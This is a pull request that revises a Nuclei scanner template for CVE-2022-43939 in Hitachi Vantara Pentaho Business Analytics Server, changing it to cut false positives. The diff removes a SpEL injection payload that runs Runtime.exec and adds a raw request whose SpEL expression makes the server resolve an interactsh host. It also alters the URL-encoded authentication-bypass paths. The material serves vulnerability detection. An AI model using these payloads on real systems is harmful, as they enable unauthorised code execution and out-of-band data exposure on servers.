### PR TITLE
fix: False Positive in CVE-2022-43939

### DIFF
--- a/nuclei/CVE-2022-43939.yaml
+++ b/nuclei/CVE-2022-43939.yaml
@@ -30,19 +30,15 @@ info:
   metadata:
     vendor: hitachi
     product: vantara_pentaho_business_analytics_server
-    shodan-query: http.favicon.hash:1749354953
+    shodan-query: http.html:"content=\"0;URL=/pentaho\""
     fofa-query: icon_hash=1749354953
 
-variables:
-  random_int: '{{rand_int(1,1000)}}'
-
 http:
-  # Original endpoint check for non-canonical URL bypass
+  # Initial endpoint check for non-canonical URL bypass
   - method: GET
     path:
-      - "{{BaseURL}}/pentaho/api/repos/:public:/:"
-      - "{{BaseURL}}/pentaho/api/repos/%3Apublic%3A/%3A"
-    matchers-condition: and
+      - "{{BaseURL}}%2Fpentaho%2Fapi%2Frepos%2F%3Apublic%3A%2F%3A"
+      - "{{BaseURL}}%2Fpentaho%2Fapi%2Frepos%2F%253Apublic%253A%2F%253A"
     matchers:
       - type: status
         status:
@@ -52,16 +48,12 @@ http:
           - "Pentaho"
         part: body
 
-  # Vulnerability check: Uses a double-encoded payload with a random integer to bypass URL parser restrictions.
-  - method: GET
-    path:
-      - "{{BaseURL}}/pentaho/api/ldap/config/ldapTreeNodeChildren/require.js?url=%2523%257BT%2528java.lang.Runtime%2529.getRuntime().exec(%2527echo%2520{{random_int}}%2527)%257D&mgrDn=a&pwd=a"
-    matchers-condition: and
+  - raw:
+      - |+
+        GET /pentaho/api/ldap/config/ldapTreeNodeChildren/require.js?url=%23{T(java.net.InetAddress).getByName('{{interactsh-url}}')}&mgrDn=a&pwd=a HTTP/1.1
+        Host: {{Hostname}}
     matchers:
-      - type: status
-        status:
-          - 200
       - type: word
+        part: interactsh_protocol
         words:
-          - "{{random_int}}"
-        part: body
+          - "dns"


### PR DESCRIPTION
## PR Description: Fix False Positives in CVE-2022-43939 Template

### Summary

This update refines the CVE-2022-43939 template for Hitachi Vantara Pentaho Business Analytics Server by addressing persistent false positives reported in earlier versions. The adjustments ensure that only genuine vulnerability indicators trigger alerts, reducing noise and improving scan accuracy.

### Changes Made

- **Updated URL Encoding for Endpoint Checks:**  
    The non-canonical URL bypass check now uses fully URL-encoded paths (e.g., `%2Fpentaho%2Fapi%2Frepos%2F%3Apublic%3A%2F%3A`) to ensure the check is performed on the correct resource. This change prevents the template from matching on benign endpoints that were previously misinterpreted as vulnerable.
    
- **Revised Exploit Verification:**  
    The template now includes a raw HTTP request that directly targets the vulnerable endpoint using a payload which triggers a DNS callback via `interactsh`. This raw request, along with its matcher (checking for the "dns" keyword in the interactsh protocol part), confirms the exploitation condition without relying on ambiguous responses from public endpoints.

![image](https://github.com/user-attachments/assets/6dc41743-2736-4bcb-80a0-cd017c8dcd5e)
